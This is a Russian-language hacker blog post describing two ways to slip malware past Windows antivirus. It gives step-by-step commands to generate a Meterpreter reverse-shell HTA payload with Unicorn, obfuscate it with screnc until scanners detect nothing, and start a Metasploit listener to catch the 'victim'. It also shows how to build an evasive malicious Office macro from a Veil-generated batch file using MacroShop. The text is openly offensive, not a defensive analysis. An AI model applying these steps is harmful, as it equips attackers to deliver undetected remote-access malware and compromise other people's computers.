В этой странице будем наводить УЖАС, на работников антивирусных компаний))
Способ 1 (03.12.2017)
И так по случаю что у меня сегодня выходной (почти, так-как все равно дергают) выпущу первый способ обхода антивирусных приложения для windows
генерим в единороге (который кстати постоянно обновляется и не забываем его тоже у себя обновлять)
python unicorn.py windows/meterpreter/reverse_tcp 192.168.1(ваш IP) 4444 hta
сгенерится .rc для metasploit-a и файлик launcher.hta вот он нас и интересует)
можете его проверить на аналоге virustotal nodistribute.com покажет около 15 сработак))
Далее что бы их "убрать" нужно отредактировать наш с генеренный файлик: < >.hta
да и не абы где а в проге screnc которую мы с успехам скачиваем и устанавливаем к себе на Kali и запускаем с помощью WINE
wine screnc.exe
и делаем все как показано выше и жмем показазано куда!
и сохраняем наш файлик затем можете проверить опять на сработку, покажет 0/36) блядь что и радует)) "жить становится веселее" И.В.Сталин
запускаем второй файл который сгенерил uncorn .rc
msfconsole -r unicorn.rc
подсовываем жертве и т.д. Так я про что я вообще то про технику маскировки от АВ .hta <--файла!))
которая прекрасно подходит для CVE-2017-11882
Способ 2 (злой-макрос)
Нам понадобится veil - (овечья шкура) запускаем!
вбиваем свой IP для обратной связи и вдавливаем по клавишам волшебное слово: generate
задаем имя нашему файлу и запоминаем путь куда сгенерятся 2 файлика .bat и .rc
Далее на понадобится волшебный скрипт: https://github.com/khr0x40sh/MacroShop
python macro_safe.py (путь к .bat который который сгенерила шкурка) test.txt
И так что мы получим? Получим макрос который сгенерил MacroShop из нашего батника))
Данный способ не является панацеей, включаем фантазию, вспоминаем кто лучше всего генерит без палевные батники переводим их в macro и ....
Думаю Вы поняли что это всего лишь пазлик) зато очень полезный)